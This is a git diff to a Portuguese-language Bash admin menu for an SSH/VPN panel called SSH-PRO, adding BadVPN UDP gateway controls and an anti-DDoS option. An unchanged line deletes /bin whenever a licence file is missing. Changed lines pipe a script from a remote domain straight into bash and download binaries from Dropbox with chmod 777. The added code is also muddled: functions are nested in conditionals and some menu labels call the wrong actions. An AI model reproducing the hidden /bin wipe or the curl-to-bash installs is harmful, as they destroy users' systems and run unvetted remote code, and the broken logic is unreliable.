2.0.8.1.1

diff --git a/Modulos/menu b/Modulos/menu
--- a/Modulos/menu
+++ b/Modulos/menu
@@ -119,7 +119,74 @@ fun_proxypro () {
 	rm -rf /usr/bin/proxypro && curl -s -L -o /usr/bin/proxypro https://github.com/xzlordzx/sshpro/raw/main/proxypro && chmod +x /usr/bin/proxypro
 	}
 fun_fixspeed () {
-    bash <(curl -sL https://script.cvpn.top/fixspeed.sh)
+    bash <(curl -sL https://script.cvpn.fun/fixspeed.sh)
+}
+fun_badpro () {
+    screen -dmS udpvpn /bin/badvpn-udpgw --listen-addr 127.0.0.1:7400 --max-clients 10000 --max-connections-for-client 8 --client-socket-sndbuf 10000 --udp-mtu 9000
+    screen -dmS udpvpn /bin/badvpn-udpgw --listen-addr 127.0.0.1:7500 --max-clients 10000 --max-connections-for-client 8 --client-socket-sndbuf 10000 --udp-mtu 9000
+	}
+fun_bad7300 () {
+	if ps x | grep -w udpvpn | grep -v grep 1>/dev/null 2>/dev/null; then
+    clear
+    echo -e "\E[41;1;37m             BADVPN              \E[0m"
+    echo ""
+fun_stopbad () {
+    sleep 1
+    for pidudpvpn in $(screen -ls | grep ".udpvpn" | awk {'print $1'}); do
+        screen -r -S "$pidudpvpn" -X quit
+	done
+    [[ $(grep -wc "udpvpn" /etc/autostart) != '0' ]] && {
+    sed -i '/udpvpn/d' /etc/autostart
+    }
+    sleep 1
+    screen -wipe >/dev/null
+    }
+fun_badofff () {
+	sudo systemctl disable --now bad7300.service && sudo systemctl stop bad7300.service && sudo systemctl daemon-reload
+	}
+    echo -e "\033[1;32mDESATIVANDO O BADVPN PRO\033[1;33m"
+    echo ""
+    fun_stopbad
+	fun_badofff
+    echo ""
+    echo -e "\033[1;32mBADVPN PRO DESATIVADO COM SUCESSO!\033[1;33m"
+    sleep 3
+    menu
+    else
+    clear
+    echo -e "\033[1;32mINICIANDO O BADVPN... \033[0m\n"
+fun_udpon () {
+    screen -dmS udpvpn /bin/badvpn-udpgw --listen-addr 127.0.0.1:7300 --max-clients 10000 --max-connections-for-client 8
+    [[ $(grep -wc "udpvpn" /etc/autostart) = '0' ]] && {
+    echo -e "ps x | grep 'udpvpn' | grep -v 'grep' || screen -dmS udpvpn /bin/badvpn-udpgw --listen-addr 127.0.0.1:7300 --max-clients 10000 --max-connections-for-client 8 --client-socket-sndbuf 10000" >> /etc/autostart
+    } || {
+    sed -i '/udpvpn/d' /etc/autostart
+    echo -e "ps x | grep 'udpvpn' | grep -v 'grep' || screen -dmS udpvpn /bin/badvpn-udpgw --listen-addr 127.0.0.1:7300 --max-clients 10000 --max-connections-for-client 8 --client-socket-sndbuf 10000" >> /etc/autostart
+        }
+    sleep 1
+    }
+inst_udp () {
+    [[ -e "/bin/badvpn-udpgw" ]] && {
+    sleep 0.1
+    } || {
+    cd $HOME
+    wget https://www.dropbox.com/s/48b36clnxkkurlz/badvpn-udpgw -o /dev/null
+    mv -f $HOME/badvpn-udpgw /bin/badvpn-udpgw
+    chmod 777 /bin/badvpn-udpgw
+        }
+    }
+fun_badinit () {
+	sudo systemctl enable bad7300.service && sudo systemctl start bad7300.service
+    }
+    echo ""
+    inst_udp
+    fun_udpon
+	fun_badinit
+    echo ""
+    echo -e "\033[1;32mBADVPN ATIVADO COM SUCESSO\033[1;33m"
+    sleep 3
+    menu
+fi
 }
 function limit_ssh () {
 [[ $(ps x | grep "limiter"|grep -v grep |wc -l) = '0' ]] && limit1 || limit2
@@ -202,11 +269,11 @@ function autoexec () {
 }
 #menu2
 menu2 (){
-[[ -e /etc/Plus-torrent ]] && stsf=$(echo -e "\033[1;32m[ON] ") || stsf=$(echo -e "\033[1;31m[OFF] ")
-stsbot=$(ps x | grep "bot_plus"|grep -v grep > /dev/null && echo -e "\033[1;32m[ON] " || echo -e "\033[1;31m[OFF] ")
-stsbotteste=$(ps x | grep "bot_teste"|grep -v grep > /dev/null && echo -e "\033[1;32m[ON] " || echo -e "\033[1;31m[OFF] ")
-stsbotrev=$(ps x | grep "bot_rev"|grep -v grep > /dev/null && echo -e "\033[1;32m[ON] " || echo -e "\033[1;31m[OFF] ")
-autm=$(grep "menu;" /etc/profile > /dev/null && echo -e "\033[1;32m[ON] " || echo -e "\033[1;31m[OFF] ")
+[[ -e /etc/Plus-torrent ]] && stsf=$(echo -e "\033[1;32m◉") || stsf=$(echo -e "\033[1;31m◉")
+stsbot=$(ps x | grep "bot_plus"|grep -v grep > /dev/null && echo -e "\033[1;32m◉" || echo -e "\033[1;31m◉")
+stsbotteste=$(ps x | grep "bot_teste"|grep -v grep > /dev/null && echo -e "\033[1;32m◉" || echo -e "\033[1;31m◉")
+stsbotrev=$(ps x | grep "bot_rev"|grep -v grep > /dev/null && echo -e "\033[1;32m◉" || echo -e "\033[1;31m◉")
+autm=$(grep "menu;" /etc/profile > /dev/null && echo -e "\033[1;32m◉" || echo -e "\033[1;31m◉")
 [[ ! -e /usr/lib/licence ]] && rm -rf /bin > /dev/null 2>&1
 if [[ "$(grep -c "Ubuntu" /etc/issue.net)" = "1" ]]; then
 system=$(cut -d' ' -f1 /etc/issue.net)
@@ -255,6 +322,7 @@ echo -e "\033[0;31m   [\033[1;36m14\033[0;31m] \033[1;37m• \033[1;37mAUTO EXEC
 \033[0;31m   [\033[1;36m16\033[0;31m] \033[1;37m• \033[1;37mDESINSTALAR SSH-PRO \033[0;31m
 \033[0;31m   [\033[1;36m17\033[0;31m] \033[1;37m• \033[1;37mBLOQUEADOR DE SITES \033[0;31m
 \033[0;31m   [\033[1;36m18\033[0;31m] \033[1;37m• \033[1;37mFIREWALL \033[0;31m
+\033[0;31m   [\033[1;36m19\033[0;31m] \033[1;37m• \033[1;37mANTI-DDOS \033[0;31m
 \033[0;31m   [\033[1;36m00\033[0;31m] \033[1;37m• \033[1;37mVOLTAR  \033[1;32m<\033[1;33m<\033[1;31m< \033[0m"
 echo -e "╚═════════════════════════•⊱✦⊰•═════════════════════════╝" | lolcat
 echo -ne "   \033[1;31m➤ \033[1;32mOPÇÃO\033[1;33m\033[1;31m\033[1;37m: "; read x
@@ -279,6 +347,10 @@ case "$x" in
    clear
    fr
    ;;
+   19)
+   clear
+   ddos
+   ;;
    0|00)
    clear
    menu
@@ -286,6 +358,46 @@ case "$x" in
    *)
    echo -e "\n\033[1;31mOpcao invalida !\033[0m"
    sleep 2
+esac
+}
+menubad (){
+clear
+echo -e "\E[44;1;37m                   🚀 BADVPN 🚀                    \E[0m"
+echo -e "\033[0;36m╔══════════════════════•⊱✦⊰•══════════════════════╗\033[0m"
+if ps x | grep -w udpvpn | grep -v grep 1>/dev/null 2>/dev/null; then
+        echo -e "\033[1;33m   PORTA\033[1;37m: \033[1;32m$(netstat -nplt | grep 'badvpn-ud' | awk {'print $4'} | cut -d: -f2 | xargs)"
+		echo -e "\033[0;36m° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° °\033[0m"
+    else
+        sleep 0.1
+    fi
+    bad_sks1=$(ps x | grep "udpvpn"|grep -v grep > /dev/null && echo -e "\033[1;32m◉" || echo -e "\033[1;31m◉")
+echo -e "\033[0;31m   [\033[1;36m01\033[0;31m] \033[1;37m• \033[1;37mATIVAR BADVPN [7300] $bad_sks1\033[0m"
+echo -e "\033[0;31m   [\033[1;36m02\033[0;31m] \033[1;37m• \033[1;37mABRIR PORTAS [7400, 7500]\033[0m"
+echo -e "\033[0;31m   [\033[1;36m00\033[0;31m] \033[1;37m• \033[1;37mVOLTAR  \033[1;32m<\033[1;33m<\033[1;31m< \033[0m"
+echo -e "\033[0;36m╚══════════════════════•⊱✦⊰•══════════════════════╝\033[0m"
+echo -ne "   \033[1;31m➤ \033[1;32mOPÇÃO\033[1;33m\033[1;31m\033[1;37m: "; read x
+case "$x" in
+   1 | 01)
+   clear
+   criarusuario
+   echo -ne "\n\033[1;31m   ENTER \033[1;33mpara retornar ao \033[1;32mMENU!\033[0m"; read
+   clear
+   ;;
+   2 | 02)
+   clear
+   criarteste
+   echo -ne "\n\033[1;31m   ENTER \033[1;33mpara retornar ao \033[1;32mMENU!\033[0m"; read
+   clear
+   ;;
+   0 | 00)
+   clear
+   menu
+   ;;
+   *)
+   echo -e "\n\033[1;31mOpcao invalida !\033[0m"
+   sleep 2
+   menubad
+   ;;
 esac
 }
 menu3 (){
@@ -488,7 +600,7 @@ swap2=$(printf '%-5s' "$(free -h | grep -i swap | awk {'print $4'})")
 swap3=$(printf '%-5s' "$(free -h | grep -i swap | awk {'print $3'})")
 clear
 figlet "         SSH-PRO" | lolcat
-echo -e "\033[1;33m  VERSÃO: \033[1;37m2.0.7"
+echo -e "\033[1;33m  VERSÃO: \033[1;37m2.0.8"
 echo -e "╔═══════════════════════════•⊱✦⊰•═══════════════════════════╗"  | lolcat
 echo -e "\033[0;36m  \033[1;32mSISTEMA           \033[1;31m  \033[1;32mMEMÓRIA RAM      \033[1;31m \033[1;32m PROCESSADOR      \033[1;31m"
 echo -e "\033[0;36m  \033[1;36mOS: \033[1;37m$_system    \033[1;31m  \033[1;36mTotal:\033[1;37m$_ram \033[1;31m  \033[1;36mNucleos: \033[1;37m$_core\033[0m   \033[1;31m"
@@ -540,8 +652,7 @@ case "$x" in
    menu4
    ;;
    9 | 09)
-   clear
-   menub
+   menubad
    ;;
    10 | 10)
    userbackup
